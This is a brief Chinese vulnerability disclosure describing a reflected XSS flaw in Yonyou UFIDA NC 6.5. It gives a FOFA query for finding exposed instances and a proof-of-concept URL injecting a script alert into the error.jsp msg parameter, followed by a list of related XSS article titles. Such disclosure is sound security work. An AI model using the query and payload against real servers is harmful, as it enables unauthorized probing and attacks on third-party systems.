漏洞描述 用友NC6.5版本存在反射型xss 漏洞复现 fofa语法:app="用友-UFIDA-NC" 访问页面: POC: /uapws/pages/error.jsp?msg=<script>alert(1)</script> 本栏目推荐文章.NET中使用HtmlSanitizer来有效的防范XSS攻击!Springboot 项目集成 PageOffice V6 最简单代码蜗牛星际NAS安装黑群晖V6.2.1+洗白+免U盘引导启动XunRuiCMS XSSSpringMVC 项目集成 PageOffice V6 最简单代码实验三(XSS和SQL注入)XSS注入测试思路+通用语句【xss实战】BurpSuite-XssValidator插件 -xss自动化测试通过kali安装源安装beef-xss网络攻防技术——XSS攻击